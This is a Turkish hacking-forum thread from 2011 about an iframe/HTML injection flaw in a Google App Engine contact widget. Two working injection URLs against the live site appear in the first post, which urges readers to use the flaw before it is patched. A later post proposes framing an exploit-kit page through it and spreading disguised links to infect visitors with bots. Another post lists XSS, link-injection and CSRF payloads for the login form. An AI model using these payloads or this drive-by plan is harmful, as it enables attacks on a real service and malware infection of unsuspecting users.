folder

Tahribat.com Forumları
line

line

folder

Bilişim Güvenliği
line

line

Google App Engine (Appspot)'De İframe Zafiyeti.

Google App Engine (Appspot)'De İframe Zafiyeti.

17/Ağu/11 07:31 Kısayol Şikayet Özel Mesaj

SpoofU

Kayıt Tarihi: 21/Mart/2008

Hindistanlı bir arkadaşımız (Ethical Mohit) Google ın appspotunda iframe açığı bulmuş, paylaşmış.

Örnek1; https://contactuswidget.appspot.com/login.jsp?domain=lc&mssg=%3Cimg%20src=%22http://oi56.tinypic.com/2u6jupj.jpg%22/%20%3E%20TBT

Örnek2; https://contactuswidget.appspot.com/login.jsp?domain=lc&mssg=<iframe src="http://tahribat.com"</iframe>

Açık yamanmadan kullanın.

Sevmem yazmayı, okumayı sevdiğim kadar.

Alıntı yap
17/Ağu/11 08:15 Kısayol Şikayet Özel Mesaj

renegadealien

Kayıt Tarihi: 23/Mart/2003

aha harbiden calışıyor :)

10.05.2013 tarihli google arama sonucu : Aradığınız - "herşeyin hayırlısı rampanın bayırlısı" - ile ilgili hiçbir arama sonucu mevcut değil. Kendi özlü sözümdür, kaynak belirterek kullanınız.

Alıntı yap
17/Ağu/11 08:57 Kısayol Şikayet Özel Mesaj

cemnet

Kayıt Tarihi: 18/Eylül/2007

Evet çalışıyor ama neler yapılabilir bu tip durumlarda siteye açıklar mısın?

Alıntı yap
17/Ağu/11 09:04 Kısayol Şikayet Özel Mesaj

g2k

Kayıt Tarihi: 03/Mayıs/2007

lan ben de iftar ziyafeti diye okuyorum sabah sabah ya oruç da tutmuyorum halbuki :|

Alıntı yap
17/Ağu/11 09:06 Kısayol Şikayet Özel Mesaj

UmuT38

Kayıt Tarihi: 27/Mayıs/2008

g2k bunu yazdı:
-----------------------------

lan ben de iftar ziyafeti diye okuyorum sabah sabah ya oruç da tutmuyorum halbuki :|

-----------------------------

sen git yat hacı en iyisi :)

Eger "dokuz" CanLı oLsaydın biLe En fazLa "sekiz" kez kaçabiLirdin öLümden BiLki "yedi" düveLe suLtan oLsan dahi Yerin "aLtı" mekan oLacak sana En fazLa "beş" metre kumaş götürebiLeceksin Kapatacaksın "dört" açsanda gözünü Bu dünya "üç" günLük dünya AzraiLin yanında "iki" kat oLup yaLvarsanda nafiLe ELbet "bir" gün öLeceksin İşte o gün herşey "sıfır"dan başLayacak..!

Alıntı yap
17/Ağu/11 09:07 Kısayol Şikayet Özel Mesaj

SpoofU

Kayıt Tarihi: 21/Mart/2008

cemnet bunu yazdı:
-----------------------------

Evet çalışıyor ama neler yapılabilir bu tip durumlarda siteye açıklar mısın?

-----------------------------

Siteye zarar vermek zorunda değilsin, exploit kitiyle donattığın siteyi iframe ile bağla, linki encrypt edip ilgi cekici bir başlıkla nette yay. Gelsin botçuklar xD.

Sevmem yazmayı, okumayı sevdiğim kadar.

Alıntı yap
17/Ağu/11 09:46 Kısayol Şikayet Özel Mesaj

ZINDIK

Kayıt Tarihi: 31/Mart/2007

çaça ayrıca bahsi geçen sitede ayrıca bu güvenlik zafiyetleri bulunmakta.

Cross Site Scripting
Cross-Site Request Forgery (İstek sahteciliği)

+
Bilgi: https://www.owasp.org/index.php/Phishing
_________

Cross Site Scripting Testleri;

command=login&username=<script>alert(19380)</script>&password=
command=login&username=<\0script>alert(19386)</script>&password=
command=login&username=<iframe src=javascript:alert(19394) &password=
command=login&username=<STYLE>@import"javascript:alert(19398)";</STYLE>&password=
...

##############

Link Enjeksiyonu/Cross-Site Request Forgery Testleri;

command=login&username="'><IMG SRC="/??.html">&password=
command=login&username="'><A HREF="/??.html">Click Here Çaça</A>&password=
...

##############
command=login&username='"><iframe src=http://çaça.url/çaça.html>&password=

...

çaça out.

return 0;
}

Alıntı yap
17/Ağu/11 09:47 Kısayol Şikayet Özel Mesaj

ZINDIK

Kayıt Tarihi: 31/Mart/2007

tbt'dedededede bu zafiyet varmış çaça.

testing van tu.

Alıntı yap
17/Ağu/11 09:48 Kısayol Şikayet Özel Mesaj

FOXXLY

Kayıt Tarihi: 19/Haziran/2006

g2k bunu yazdı:
-----------------------------

lan ben de iftar ziyafeti diye okuyorum sabah sabah ya oruç da tutmuyorum halbuki :|

-----------------------------

kesinlikle aynı şekilde okudum :(

gerçi ben orucum herşeyi yanlış okuorum :D

kelimeler albayım bazı anlamlara gelmiyor.

Alıntı yap

Toplam Hit: 13710 Toplam Mesaj: 9

Cevapla